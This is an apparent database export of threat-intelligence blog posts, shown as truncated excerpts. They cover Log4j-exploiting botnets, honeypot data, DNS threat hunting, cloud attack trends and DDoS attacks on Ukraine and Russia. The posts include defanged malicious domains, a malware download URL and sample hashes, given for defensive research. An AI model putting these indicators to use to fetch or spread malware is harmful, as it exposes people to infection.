{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 样本分析\n\n### MIRAI\n这一波传播的为miria新变种,相比最初代码,它做了如下变动:\n1. 移除了 table_init/table_lock_val/table_unlock_val 等mirai特有的配置管理函数。\n2. attack_init 函数也被抛弃,ddos攻击函数会被指令处理函数直接调用。\n\n同时,其C2域名选用了一个 uy 顶级域的域名,这在国内也是很少见的。\n\n### Muhstik\n\nMuhstik 这个网络最早被披露于 [2018](__GHOS...
61b487d43819e50007636c5a
post
null
2021-12-11T13:28:19.000Z
63873b9a8b1c1e0007f52ffd
xx
0
2021-12-11T13:59:28.000Z
public
draft
null
null
xx
<!--kg-card-begin: markdown--><p>年末曝光的Log4j漏洞无疑可以算是今年的安全界大事了。作为专注于蜜罐和botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些botnet利用。今早我们等来了首批答案,我们的Anglerfish和Apacket蜜罐先后捕获到2波利用Log4j漏洞组建botnet的攻击,快速的样本分析表明它们分别用于组建 Muhstik 和Mirai botnet,针对的都是Linux设备。</p> <h2 id="">样本分析</h2> <h3 id="mirai">MIRAI</h3> <p>这一波传播的为miria新变种,相比最初代码,它做了如下变动:</p> <o...
年末曝光的Log4j漏洞无疑可以算是今年的安全界大事了。作为专注于蜜罐和botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些botnet利用。今早我们等来了首批答案,我们的Anglerfish和Apacket蜜罐先后捕获到2波利用Log4j漏洞组建botnet的攻击,快速的样本分析表明它们分别用于组建 Muhstik 和Mirai botnet,针对的都是Linux设备。 样本分析 MIRAI 这一波传播的为miria新变种,相比最初代码,它做了如下变动: 1. 移除了 table_init/table_lock_val/table_unlock_val 等mirai特有的配置管理函数。 2....
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"年末曝光的Log4j漏洞无疑可以算是今年的安全界大事了。作为专注于蜜罐和botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些botnet利用。今早我们等来了首批答案,我们的Anglerfish和Apacket蜜罐先后捕获到2波利用Log4j漏洞组建botnet的攻击,快速的样本分析表明它们分别用于组建 Muhstik 和Mirai botnet,针对的都是Linux设备。\n\n## 样本分析\n\n### MIRAI\n这一波传播的为miria新变种,相比最初代码,它做了如下变动:\n1....
61b4a7733819e50007636da4
post
null
2021-12-11T14:14:42.000Z
63873b9a8b1c1e0007f52ffe
threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets
0
2022-04-19T02:49:33.000Z
public
published
null
2021-12-11T14:28:41.000Z
Threat Alert: Log4j Vulnerability Has Been adopted by two Linux Botnets
<!--kg-card-begin: markdown--><p>The Log4j vulnerability that came to light at the end of the year can undoubtedly be considered a major event in the security community. Honeypot and botnet are our bread and butter, and we have been concerned about which botnets would be exploiting this since the vulnerability was mad...
The Log4j vulnerability that came to light at the end of the year can undoubtedly be considered a major event in the security community. Honeypot and botnet are our bread and butter, and we have been concerned about which botnets would be exploiting this since the vulnerability was made public. This morning we got the ...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"The Log4j vulnerability that came to light at the end of the year can undoubtedly be considered a major event in the security community. Honeypot and botnet are our bread and butter, and we have been concerned about which botnets would be exploiting this ...
61b4b2523819e50007636db1
post
null
2021-12-13T07:38:47.000Z
63873b9a8b1c1e0007f52fff
yi-jing-you-xxxge-jia-zu-de-botnetli-yong-log4shelllou-dong-chuan-bo-wei-da-bu-ding-de-gan-jin-liao
0
2022-06-24T03:48:00.000Z
public
published
null
2021-12-13T13:48:52.000Z
已有10个家族的恶意样本利用Log4j2漏洞传播
<!--kg-card-begin: markdown--><h2 id="">背景介绍</h2> <p>2021年12月11号8点整,我们率先捕获到Muhstik僵尸网络样本通过Log4j2 RCE漏洞传播,并首发披露Mirai和Muhstik僵尸网络在野利用详情<a href="__GHOST_URL__/wei-xie-kuai-xun-log4jlou-dong-yi-jing-bei-yong-lai-zu-jian-botnet-zhen-dui-linuxshe-bei/">[1]</a>。</p> <p>2天来,我们陆续又捕获到其它家族的样本,目前,这个家族列表已经超过10个,这里从漏洞、payload、攻击IP 和...
背景介绍 2021年12月11号8点整,我们率先捕获到Muhstik僵尸网络样本通过Log4j2 RCE漏洞传播,并首发披露Mirai和Muhstik僵尸网络在野利用详情[1]。 2天来,我们陆续又捕获到其它家族的样本,目前,这个家族列表已经超过10个,这里从漏洞、payload、攻击IP 和样本分析等几个维度介绍我们的捕获情况。 Apache Log4j2 漏洞攻击分布 360网络安全研究院大网蜜罐系统监测到Apache Log4j2 RCE漏洞(CVE-2021-44228)扫描及攻击,源IP地址地理位置分布如下: 国家/地区 攻击源IP数量 Germany 271 The Nethe...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 背景介绍\n2021年12月11号8点整,我们率先捕获到Muhstik僵尸网络样本通过Log4j2 RCE漏洞传播,并首发披露Mirai和Muhstik僵尸网络在野利用详情[[1]](__GHOST_URL__/wei-xie-kuai-xun-log4jlou-dong-yi-jing-bei-yong-lai-zu-jian-botnet-zhen-dui-linuxshe-bei/)。\n\n2天来,我们陆续又捕获到其它家族的样本,目前,这个家族列表已经超过10个,这里从漏洞、payload、攻...
61b6f8873819e50007636dd0
post
null
2021-12-13T15:23:09.000Z
63873b9a8b1c1e0007f53000
ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now
0
2022-02-09T07:16:26.000Z
public
published
null
2021-12-13T15:42:09.000Z
Ten families of malicious samples are spreading using the Log4j2 vulnerability Now
<!--kg-card-begin: markdown--><h2 id="background">Background</h2> <p>On December 11, 2021, at 8:00 pm, we published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability<a href="__GHOST_URL__/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/">[1]</a>。</p> ...
Background On December 11, 2021, at 8:00 pm, we published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability[1]。 Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10. It looks like the race between the offense a...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Background\nOn December 11, 2021, at 8:00 pm, we published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability[[1]](__GHOST_URL__/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/)。\n\nOv...
61b7655d3819e50007636f1b
post
null
2021-12-20T03:07:55.000Z
63873b9a8b1c1e0007f53001
apache-log4j2-vulnerability-attack-trend-from-the-perspective-of-honeypot
0
2022-04-08T06:29:32.000Z
public
published
null
2021-12-21T04:13:23.000Z
从蜜罐视角看Apache Log4j2漏洞攻击趋势
<!--kg-card-begin: markdown--><h2 id="1">1 概述</h2> <p>Apache Log4j2是一个Java的日志库,可用于控制日志信息的级别和日志生成过程。最近,Apache Log4j2被曝出JNDI注入漏洞(CVE-2021-44228),攻击者仅需要向目标服务器发送特定JNDI链接就可以触发漏洞并在目标机器上执行任意代码,影响面和破坏力极大。受影响用户需及时升级到安全版本。</p> <p>360网络安全研究院 Anglerfish蜜罐系统在搜集网络攻击威胁情报领域具有国际领先的技术优势。从2017年WannaCry勒索病毒爆发至今,我们通过对网络攻击常见套路的分析和总结,模拟了大量应用...
1 概述 Apache Log4j2是一个Java的日志库,可用于控制日志信息的级别和日志生成过程。最近,Apache Log4j2被曝出JNDI注入漏洞(CVE-2021-44228),攻击者仅需要向目标服务器发送特定JNDI链接就可以触发漏洞并在目标机器上执行任意代码,影响面和破坏力极大。受影响用户需及时升级到安全版本。 360网络安全研究院 Anglerfish蜜罐系统在搜集网络攻击威胁情报领域具有国际领先的技术优势。从2017年WannaCry勒索病毒爆发至今,我们通过对网络攻击常见套路的分析和总结,模拟了大量应用协议和漏洞特征。该系统已经具备及时发现并响应大网威胁的能力,在第一时间内发现了多起大规模网络攻击事件。 ...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 1 概述\n\nApache Log4j2是一个Java的日志库,可用于控制日志信息的级别和日志生成过程。最近,Apache Log4j2被曝出JNDI注入漏洞(CVE-2021-44228),攻击者仅需要向目标服务器发送特定JNDI链接就可以触发漏洞并在目标机器上执行任意代码,影响面和破坏力极大。受影响用户需及时升级到安全版本。\n\n360网络安全研究院 Anglerfish蜜罐系统在搜集网络攻击威胁情报领域具有国际领先的技术优势。从2017年WannaCry勒索病毒爆发至今,我们通过对网络攻击常...
61bff38b3819e50007636f75
post
null
2021-12-20T08:00:16.000Z
63873b9a8b1c1e0007f53002
use_dta_to_illuminate_the_path_of_dns_threat_analysis_1
0
2022-01-12T02:35:10.000Z
public
published
null
2021-12-27T02:50:48.000Z
用DTA照亮DNS威胁分析之路 (1)
<p><strong><em>--- “历史重现”小功能</em></strong></p><h2 id="-">概述</h2><p>2021年10月,<a href="__GHOST_URL__/360dta-announced/">《七年一剑,360 DNS威胁分析平台》</a>宣告了360 DNS威胁分析平台(简称DTA)的诞生。在文章开头,Netlab阐述了设计DTA的核心理念:</p><!--kg-card-begin: markdown--><blockquote> <p>让情报发挥应有价值<br> 让威胁分析真正有效</p> </blockquote> <!--kg-card-end: markdown--><p>理念...
--- “历史重现”小功能 概述 2021年10月,《七年一剑,360 DNS威胁分析平台》宣告了360 DNS威胁分析平台(简称DTA)的诞生。在文章开头,Netlab阐述了设计DTA的核心理念: 让情报发挥应有价值 让威胁分析真正有效 理念是简洁的,也是抽象的。18个字背后,对应着Neltab 7年的安全研究经验;而7年的沉淀,又在2年时间的打磨里,变成了DTA众多的功能。为了让抽象的理念具象化,后续,我们将推出一系列DTA相关博文,希望通过这些文章案例,在介绍产品某个具体功能如何使用的同时,顺带说明理念是怎样指导功能设计的;也希望这些示例,能为DTA的进阶使用者提供入门参考。 需要提醒使用者的是,DTA...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"> 让情报发挥应有价值\n> 让威胁分析真正有效"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/03-1.png","caption":"图-1 全局搜索栏无命中"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/04.png","caption":"图-2 全局搜索栏有命中"}],["image",{"src":"__GHOST_URL__/content/images/20...
61c038103819e50007636fd4
post
null
2021-12-21T02:18:05.000Z
63873b9a8b1c1e0007f53003
apache-log4j2-vulnerability-attack-trend-from-the-perspective-of-honeypot-en
0
2022-02-09T07:16:15.000Z
public
published
null
2021-12-21T04:13:32.000Z
Day 10: where we are with log4j from honeypot’s perspective
<p>Our team spent great deal of effort on simulating different protocols, applications and vulnerabilities with our honeypot (Anglerfish and Apacket) system. When big event happens, we are always curious what we see from the honeypot side. Since log4j came to light 10 days ago, we have published two related blogs, <a h...
Our team spent great deal of effort on simulating different protocols, applications and vulnerabilities with our honeypot (Anglerfish and Apacket) system. When big event happens, we are always curious what we see from the honeypot side. Since log4j came to light 10 days ago, we have published two related blogs, here an...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/12/image-33.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/image-31.png"}],["markdown",{"markdown":"| IPs | sessions with malware | md5s | malware families |\n| --------------- | ------------------ | ----------- | --...
61c1395d3819e500076370fc
post
null
2021-12-24T10:03:20.000Z
63873b9a8b1c1e0007f53004
gan-ran-liang-ju-da-de
0
2021-12-27T03:34:01.000Z
public
draft
null
null
用DNS发现未知威胁,恶意程序基础设施迭代更新
<!--kg-card-begin: markdown--><h2 id="">之发现</h2> <p>360Netlab的DNSMon利用海量的多维度数据以及大网的DNS数据,对异常的域名进行监控判定,如果定性为恶意域名会自动生成IOC并在一定范围内进行拦截。</p> <p>在12.8,DNSMon在无规则的情况下拦截了一个异常的二级域名 xiaoniu321[.]com及其子域名www2.xiaoniu321[.]com 。</p> <img src = '/content/images/2021/12/xiaoniu321.png' width="860px" /> <img src = "/content/images/20...
之发现 360Netlab的DNSMon利用海量的多维度数据以及大网的DNS数据,对异常的域名进行监控判定,如果定性为恶意域名会自动生成IOC并在一定范围内进行拦截。 在12.8,DNSMon在无规则的情况下拦截了一个异常的二级域名 xiaoniu321[.]com及其子域名www2.xiaoniu321[.]com 。 在12.10针对样本数据的分析中,发现样本 65982deb6ac30b9f1f4dab1aa26a0d0e 在大量扩散并且和之前拦截的域名有着密切的关系,同时注意到www2的子域名上存在如下的URL链接。 http://www2.xiaoniu321[.]com:9002/1vv/ii7.ex...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 之发现\n360Netlab的DNSMon利用海量的多维度数据以及大网的DNS数据,对异常的域名进行监控判定,如果定性为恶意域名会自动生成IOC并在一定范围内进行拦截。\n\n在12.8,DNSMon在无规则的情况下拦截了一个异常的二级域名 xiaoniu321[.]com及其子域名www2.xiaoniu321[.]com 。\n\n<img src = '/content/images/2021/12/xiaoniu321.png' width=\"860px\" />\n<img src = \...
61c59ae83819e50007637589
post
null
2021-12-28T07:19:57.000Z
63873b9a8b1c1e0007f53005
use_dta_to_illuminate_the_path_of_dns_threat_analysis_2
0
2022-01-12T02:34:22.000Z
public
published
null
2022-01-11T08:28:10.000Z
用DTA照亮DNS威胁分析之路 (2)
<p><em><strong>--- 对服务器网段进行未知威胁分析</strong></em></p><h2 id="-">概述</h2><p>要进行网络威胁狩猎,或者低调点叫网络威胁分析,通常需要具备3个能力:</p><!--kg-card-begin: markdown--><blockquote> <p>1、找到线索的能力。这里的能力是特指在无先验知识(IoC等)条件下,既尽可能无漏报又不会有太多误报地从海量数据里挖掘出线索;<br> 2、确认线索是威胁的能力。线索是包含噪音的,需要去除噪音只留下有威胁的线索;<br> 3、分辨资产被真实感染的能力。只有确认真实感染,才能保证后续的威胁处置动作有成果。<br> <small>按...
--- 对服务器网段进行未知威胁分析 概述 要进行网络威胁狩猎,或者低调点叫网络威胁分析,通常需要具备3个能力: 1、找到线索的能力。这里的能力是特指在无先验知识(IoC等)条件下,既尽可能无漏报又不会有太多误报地从海量数据里挖掘出线索; 2、确认线索是威胁的能力。线索是包含噪音的,需要去除噪音只留下有威胁的线索; 3、分辨资产被真实感染的能力。只有确认真实感染,才能保证后续的威胁处置动作有成果。 按:由于DTA也实现有“已知”威胁分析功能,但其用法和本文描述的操作细节相差甚远,为避免混淆,特此说明一下本文所有威胁分析的用词,都是指“未知”威胁分析。 在上一篇文章,我们提到DNS日志的优点是简单且重要。但正...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"> 1、找到线索的能力。这里的能力是特指在无先验知识(IoC等)条件下,既尽可能无漏报又不会有太多误报地从海量数据里挖掘出线索;\n>2、确认线索是威胁的能力。线索是包含噪音的,需要去除噪音只留下有威胁的线索;\n>3、分辨资产被真实感染的能力。只有确认真实感染,才能保证后续的威胁处置动作有成果。\n><small>按:由于DTA也实现有“已知”威胁分析功能,但其用法和本文描述的操作细节相差甚远,为避免混淆,特此说明一下本文所有威胁分析的用词,都是指“未知”威胁分析。</small>"}],["markdo...
61caba9d3819e500076375ed
post
null
2022-01-14T02:20:06.000Z
63873b9a8b1c1e0007f53006
public-cloud-threat-intelligence-202112
0
2022-06-24T03:46:31.000Z
public
published
null
2022-01-19T03:57:18.000Z
公有云网络安全威胁情报(202112)
<!--kg-card-begin: markdown--><h3 id="1">1. 概述</h3> <p>云服务具备部署方便、资源灵活弹性、按需付费等优势,各类企业、政府、事业单位、高校和研究机构近年来都参与到了“上云”的潮流中。然而,随着越来越多各行各业的敏感数据“上云”,云安全问题的重要性和紧迫性也越发突出。近年来,全球云服务器被DDoS攻击、入侵、网站页面恶意修改、敏感数据泄露、加密勒索、恶意挖矿等安全事件频发,特别是提供公网服务的云主机,时时刻刻面临着<strong>漏洞攻击、暴力破解、Bot流量等</strong>云上网络威胁,这要求无论是云服务商还是云上用户都需要时刻做好威胁检测和处置的准备。</p> <p>云安全的...
1. 概述 云服务具备部署方便、资源灵活弹性、按需付费等优势,各类企业、政府、事业单位、高校和研究机构近年来都参与到了“上云”的潮流中。然而,随着越来越多各行各业的敏感数据“上云”,云安全问题的重要性和紧迫性也越发突出。近年来,全球云服务器被DDoS攻击、入侵、网站页面恶意修改、敏感数据泄露、加密勒索、恶意挖矿等安全事件频发,特别是提供公网服务的云主机,时时刻刻面临着漏洞攻击、暴力破解、Bot流量等云上网络威胁,这要求无论是云服务商还是云上用户都需要时刻做好威胁检测和处置的准备。 云安全的关键是“知己知彼”。“知己”就是做好云上资产、组件、数据和漏洞的管理,包括对云上数据按照敏感程度分类管控、对云上资产和组件做好清点和监控,...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### 1. 概述\n\n云服务具备部署方便、资源灵活弹性、按需付费等优势,各类企业、政府、事业单位、高校和研究机构近年来都参与到了“上云”的潮流中。然而,随着越来越多各行各业的敏感数据“上云”,云安全问题的重要性和紧迫性也越发突出。近年来,全球云服务器被DDoS攻击、入侵、网站页面恶意修改、敏感数据泄露、加密勒索、恶意挖矿等安全事件频发,特别是提供公网服务的云主机,时时刻刻面临着**漏洞攻击、暴力破解、Bot流量等**云上网络威胁,这要求无论是云服务商还是云上用户都需要时刻做好威胁检测和处置的准备。\n\...
61e0ddd63819e50007637cbb
post
null
2022-02-10T10:32:04.000Z
63873b9a8b1c1e0007f53007
use_dta_to_illuminate_the_path_of_dns_threat_analysis_3
0
2022-02-24T02:40:28.000Z
public
published
null
2022-02-24T02:40:28.000Z
用DTA照亮DNS威胁分析之路 (3)
<p><strong><em>--- 内置未知威胁分析模型介绍</em></strong></p><h2 id="-">概述</h2><p>在<a href="__GHOST_URL__/use_dta_to_illuminate_the_path_of_dns_threat_analysis_2/">系列文章2</a>,介绍了如何利用DTA进行一轮完整的未知威胁分析,共有3个步骤:</p><!--kg-card-begin: markdown--><blockquote> <p>1、提出分析思路,从DNS日志里找到可疑线索<br> 2、确认可疑线索有威胁行为<br> 3、借助DNS日志确认资产被感染</p> </blockquot...
--- 内置未知威胁分析模型介绍 概述 在系列文章2,介绍了如何利用DTA进行一轮完整的未知威胁分析,共有3个步骤: 1、提出分析思路,从DNS日志里找到可疑线索 2、确认可疑线索有威胁行为 3、借助DNS日志确认资产被感染 其中,这几个步骤里最为安全分析人员所熟悉的应该是步骤2,毕竟日常工作大家都少不了利用各家威胁情报平台、搜索引擎和云沙箱进行信息搜集+关联+确认可疑线索;而步骤1和3,因为涉及到DNS日志,对于不熟悉DNS的分析人员来说,是需要一定学习成本去积累相关分析经验和熟悉DTA的各类元数据的。 因此,针对未知威胁分析,DTA预置了可疑心跳域名、可疑NOD(新出现在网络中的可疑域名)、可疑境外域名...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"> 1、提出分析思路,从DNS日志里找到可疑线索\n> 2、确认可疑线索有威胁行为\n> 3、借助DNS日志确认资产被感染"}],["image",{"src":"__GHOST_URL__/content/images/2022/02/07.png","caption":"图-1 首页_未知威胁"}],["markdown",{"markdown":"| 实体 | 元素1 | 元素2 | 元素3 | 日志的含义 |\n| ---- | ---- | ---- | ---- ...
6204e9a44257f30007fd0260
post
null
2022-02-10T11:11:35.000Z
63873b9a8b1c1e0007f53008
use_dta_to_illuminate_the_path_of_dns_threat_analysis_4
0
2022-02-28T09:56:29.000Z
public
draft
null
null
用DTA照亮DNS威胁分析之路 (4)
<p><strong><strong><em><em>--- 发挥人的能动作用</em></em></strong></strong></p><h2 id="-"><strong>概述</strong></h2><p></p><h2 id="--1">举例</h2><p>未知威胁无告警</p><figure class="kg-card kg-image-card"><img src="__GHOST_URL__/content/images/2022/02/00.png" class="kg-image" alt loading="lazy"></figure><p>只保留新出现的心跳域名</p><figure class="kg...
--- 发挥人的能动作用 概述 举例 未知威胁无告警 只保留新出现的心跳域名 点击心跳域名列表左上角的威胁情报图 样本无识别 telegram中文版“关联出样本80385 中文版下载地址 域名注册时间 安装压缩包 安装文件名称 安装文件MD5 VT识别 telegram-cn[.]org 2021-06-30 14:30:21 tsetup.zip Telegram中文版.msi 58f8d9e024de1ad31c6c88e70bba6f58 14/57 www[.]telegram-zh[.]org 2021-11-24 14:28:25 Telegram Desktop.zip Tel...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2022/02/00.png"}],["image",{"src":"__GHOST_URL__/content/images/2022/02/01-2.png"}],["image",{"src":"__GHOST_URL__/content/images/2022/02/02-4.png"}],["image",{"src":"__GHOST_URL__/content/images/2022/02/06-5.png"}],["markdown",{"markd...
6204f2e74257f30007fd0298
post
null
2022-02-16T07:13:06.000Z
63873b9a8b1c1e0007f53009
public-cloud-threat-intelligence-202201
0
2022-06-24T03:46:11.000Z
public
published
null
2022-02-21T02:43:02.000Z
公有云网络安全威胁情报(202201)
<!--kg-card-begin: markdown--><h2 id="1">1. 概述</h2> <p>2022年的第一个月份,虽然没有爆发新的热门漏洞,且随着越来越多设备的Apache Log4j2漏洞被修复,12月开始的Apache Log4j2漏洞爆发也进入尾声,相关攻击源数量明显减少。但是,Docker Remote API未授权访问漏洞、美国飞塔(Fortinet)FortiOS未授权任意文件读取漏洞等旧漏洞的云服务器攻击源IP数量突然较12月大幅度增加。在第2部分,我们分析了这两个漏洞的攻击趋势和攻击方法。政府和企事业单位的云上资产方面,1月份共发现26个云上资产对外扫描攻击,其中某航天研究单位、某县级人民医院(都...
1. 概述 2022年的第一个月份,虽然没有爆发新的热门漏洞,且随着越来越多设备的Apache Log4j2漏洞被修复,12月开始的Apache Log4j2漏洞爆发也进入尾声,相关攻击源数量明显减少。但是,Docker Remote API未授权访问漏洞、美国飞塔(Fortinet)FortiOS未授权任意文件读取漏洞等旧漏洞的云服务器攻击源IP数量突然较12月大幅度增加。在第2部分,我们分析了这两个漏洞的攻击趋势和攻击方法。政府和企事业单位的云上资产方面,1月份共发现26个云上资产对外扫描攻击,其中某航天研究单位、某县级人民医院(都架设在阿里云上)等单位使用的云服务器IP在公网上发起攻击,值得关注。本文主要通过360网络安全...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 1. 概述\n\n2022年的第一个月份,虽然没有爆发新的热门漏洞,且随着越来越多设备的Apache Log4j2漏洞被修复,12月开始的Apache Log4j2漏洞爆发也进入尾声,相关攻击源数量明显减少。但是,Docker Remote API未授权访问漏洞、美国飞塔(Fortinet)FortiOS未授权任意文件读取漏洞等旧漏洞的云服务器攻击源IP数量突然较12月大幅度增加。在第2部分,我们分析了这两个漏洞的攻击趋势和攻击方法。政府和企事业单位的云上资产方面,1月份共发现26个云上资产对外扫描攻...
620ca4024257f30007fd02cd
post
null
2022-02-17T07:03:42.000Z
63873b9a8b1c1e0007f5300a
wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie
0
2022-02-25T16:21:50.000Z
public
published
null
2022-02-25T08:55:10.000Z
我们近期看到的针对乌克兰和俄罗斯的DDoS攻击细节
<!--kg-card-begin: markdown--><p>在360Netlab(netlab.360.com),我们持续的通过我们的 BotMon 系统跟踪全球范围内的僵尸网络。特别的,对于DDoS 相关的僵尸网络,我们会进一步跟踪其内部指令,从而得以了解攻击的细节,包括攻击者是谁、受害者是谁、在什么时间、具体使用什么攻击方式。<br> 最近俄乌局势紧张,双方的多个政府、军队和金融机构都遭到了DDoS攻击,我们也不断接收到安全社区的询问,咨询对于最近乌克兰和俄罗斯相关网站 (.ua .ru下属域名)遭受DDoS攻击的具体情况,因此我们特意整理相关数据供安全社区参考。</p> <h2 id="ddos">针对乌克兰的DDoS攻...
在360Netlab(netlab.360.com),我们持续的通过我们的 BotMon 系统跟踪全球范围内的僵尸网络。特别的,对于DDoS 相关的僵尸网络,我们会进一步跟踪其内部指令,从而得以了解攻击的细节,包括攻击者是谁、受害者是谁、在什么时间、具体使用什么攻击方式。 最近俄乌局势紧张,双方的多个政府、军队和金融机构都遭到了DDoS攻击,我们也不断接收到安全社区的询问,咨询对于最近乌克兰和俄罗斯相关网站 (.ua .ru下属域名)遭受DDoS攻击的具体情况,因此我们特意整理相关数据供安全社区参考。 针对乌克兰的DDoS攻击 下图是我们看到的针对域名以.gov.ua结尾的政府网站的攻击趋势。 可以看到攻击最早...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"在360Netlab(netlab.360.com),我们持续的通过我们的 BotMon 系统跟踪全球范围内的僵尸网络。特别的,对于DDoS 相关的僵尸网络,我们会进一步跟踪其内部指令,从而得以了解攻击的细节,包括攻击者是谁、受害者是谁、在什么时间、具体使用什么攻击方式。\n最近俄乌局势紧张,双方的多个政府、军队和金融机构都遭到了DDoS攻击,我们也不断接收到安全社区的询问,咨询对于最近乌克兰和俄罗斯相关网站 (.ua .ru下属域名)遭受DDoS攻击的具体情况,因此我们特意整理相关数据供安全社区参考。\n...
620df34e4257f30007fd03dd
post
null
2022-02-25T15:31:32.000Z
63873b9a8b1c1e0007f5300b
some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days
0
2022-02-25T16:16:23.000Z
public
published
null
2022-02-25T16:14:22.000Z
Some details of the DDoS attacks targeting Ukraine and Russia in recent days
<!--kg-card-begin: markdown--><p>At 360Netlab, we continuously track botnets on a global scale through our BotMon system. In particular, for DDoS-related botnets, we further tap into their C2 communications to enable us really see the details of the attacks. Equipped with this visibility, when attack happens, we can ha...
At 360Netlab, we continuously track botnets on a global scale through our BotMon system. In particular, for DDoS-related botnets, we further tap into their C2 communications to enable us really see the details of the attacks. Equipped with this visibility, when attack happens, we can have a clear picture of who the vic...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"At 360Netlab, we continuously track botnets on a global scale through our BotMon system. In particular, for DDoS-related botnets, we further tap into their C2 communications to enable us really see the details of the attacks. Equipped with this visibility,...
6218f6544257f30007fd0a65
post
null
2022-03-02T02:33:55.000Z
63873b9a8b1c1e0007f5300c
public-cloud-threat-intelligence-202202
0
2022-06-24T03:45:56.000Z
public
published
null
2022-03-11T04:21:40.000Z
公有云网络安全威胁情报(202202)
<!--kg-card-begin: markdown--><h2 id="1">1. 概述</h2> <ul> <li> <p>17个云上重点资产有漏洞攻击行为,包括某民主党派市级委员会、某县级中医院等云上重点单位。</p> </li> <li> <p>随着俄乌冲突全面升级,我们发现有攻击者利用Docker Remote API未授权访问漏洞,对俄罗斯境内服务器发起拒绝服务(DoS)网络攻击。</p> </li> <li> <p>Apache APISIX本月爆出远程代码执行漏洞(CVE-2022-24112),攻击者通过两种攻击方式可远程执行恶意代码。</p> </li> </ul> <p>本文主要通过360网络安全研究院 An...
1. 概述 * 17个云上重点资产有漏洞攻击行为,包括某民主党派市级委员会、某县级中医院等云上重点单位。 * 随着俄乌冲突全面升级,我们发现有攻击者利用Docker Remote API未授权访问漏洞,对俄罗斯境内服务器发起拒绝服务(DoS)网络攻击。 * Apache APISIX本月爆出远程代码执行漏洞(CVE-2022-24112),攻击者通过两种攻击方式可远程执行恶意代码。 本文主要通过360网络安全研究院 Anglerfish蜜罐视角,分析云上热门漏洞攻击细节,以及云上重要资产在公网上发起攻击的情况。 2...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 1. 概述\n\n- 17个云上重点资产有漏洞攻击行为,包括某民主党派市级委员会、某县级中医院等云上重点单位。\n\n- 随着俄乌冲突全面升级,我们发现有攻击者利用Docker Remote API未授权访问漏洞,对俄罗斯境内服务器发起拒绝服务(DoS)网络攻击。\n\n- Apache APISIX本月爆出远程代码执行漏洞(CVE-2022-24112),攻击者通过两种攻击方式可远程执行恶意代码。\n\n本文主要通过360网络安全研究院 Anglerfish蜜罐视角,分析云上热门漏洞攻击细节,以及云...
621ed7934257f30007fd0aff
post
null
2022-03-03T08:51:47.000Z
63873b9a8b1c1e0007f5300d
comparison_ua_ru
0
2022-03-03T11:34:18.000Z
public
draft
null
null
俄乌冲突对比(DDoS攻击)
<!--kg-card-begin: markdown--><p>考虑到我方视野不可避免的具有一定局限性,所以以下内容仅可供参考,并不能作为严谨定论。</p> <h2 id="">激烈状态对比</h2> <p>从数据上看,针对 *.gov.ua 域名的攻击在 2月 23 日出现比较多的增长,这一天正是俄乌武力冲突的第一天。</p> <p><img src="__GHOST_URL__/content/images/2022/03/---copy-2.png" alt="---copy-2" loading="lazy"></p> <p>而针对 *.gov.ru 域名的攻击,则在 2月 26日 出现比较多的增长(如下图所示),这一天希...
考虑到我方视野不可避免的具有一定局限性,所以以下内容仅可供参考,并不能作为严谨定论。 激烈状态对比 从数据上看,针对 *.gov.ua 域名的攻击在 2月 23 日出现比较多的增长,这一天正是俄乌武力冲突的第一天。 而针对 *.gov.ru 域名的攻击,则在 2月 26日 出现比较多的增长(如下图所示),这一天希拉里在媒体号召网络势力通过攻击俄罗斯支持乌克兰。 《Hillary Clinton Advocates Cyber Attacks To Support Opposition Inside Russia: "We Did Some Of That In The Arab Spring"》 “号...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"考虑到我方视野不可避免的具有一定局限性,所以以下内容仅可供参考,并不能作为严谨定论。\n\n## 激烈状态对比\n\n从数据上看,针对 \\*.gov.ua 域名的攻击在 2月 23 日出现比较多的增长,这一天正是俄乌武力冲突的第一天。\n\n![---copy-2](__GHOST_URL__/content/images/2022/03/---copy-2.png)\n\n而针对 \\*.gov.ru 域名的攻击,则在 2月 26日 出现比较多的增长(如下图所示),这一天希拉里在媒体号召网络势力通过攻击...
622081a3a5c41b00078fc431
post
null
2022-03-09T10:51:48.000Z
63873b9a8b1c1e0007f5300e
b1txor20-use-of-dns-tunneling_cn
0
2022-03-15T10:50:21.000Z
public
published
null
2022-03-15T03:47:45.000Z
新威胁:使用DNS Tunnel技术的Linux后门B1txor20正在通过Log4j漏洞传播
